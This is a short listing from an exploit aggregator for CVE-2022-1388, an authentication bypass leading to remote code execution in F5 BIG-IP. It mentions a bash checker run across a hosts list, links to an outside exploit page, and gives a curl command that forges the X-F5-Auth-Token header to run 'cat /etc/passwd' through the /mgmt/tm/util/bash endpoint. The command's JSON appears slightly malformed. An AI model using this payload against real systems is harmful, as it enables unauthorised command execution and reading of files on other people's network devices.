Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager CVE-2022-1388

Name: Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager CVE-2022-1388
Rating: 5 (101 reviews)

2022-05-08 | CVSS 7.5

## https://sploitus.com/exploit?id=1A3F2735-FB81-52A4-BF5F-FD8A728C3CA9
# CVE-2022-1388 RCE checker

Simple bash script to check CVE-2022-1388 RCE (F5 BIG-IP).

[+] Usage: `./CVE-2022-1388.sh hosts.txt`

# [CVE-2022-1388 RCE POC Exploit](https://www.exploitcve.com/2022/05/cve-2022-1388-F5-rce-exploit-poc.html)

Don't forget to change the [IP address](https://myipv4address.com/)
```
curl -X POST http://10.0.0.1/mgmt/tm/util/bash -d "{'command':'run','utilCmdArgs':-e 'cat /etc/passwd'}" -H "Connection: keep-alive, X-F5-Auth-Token" -H "X-F5-Auth-Token: anything"
```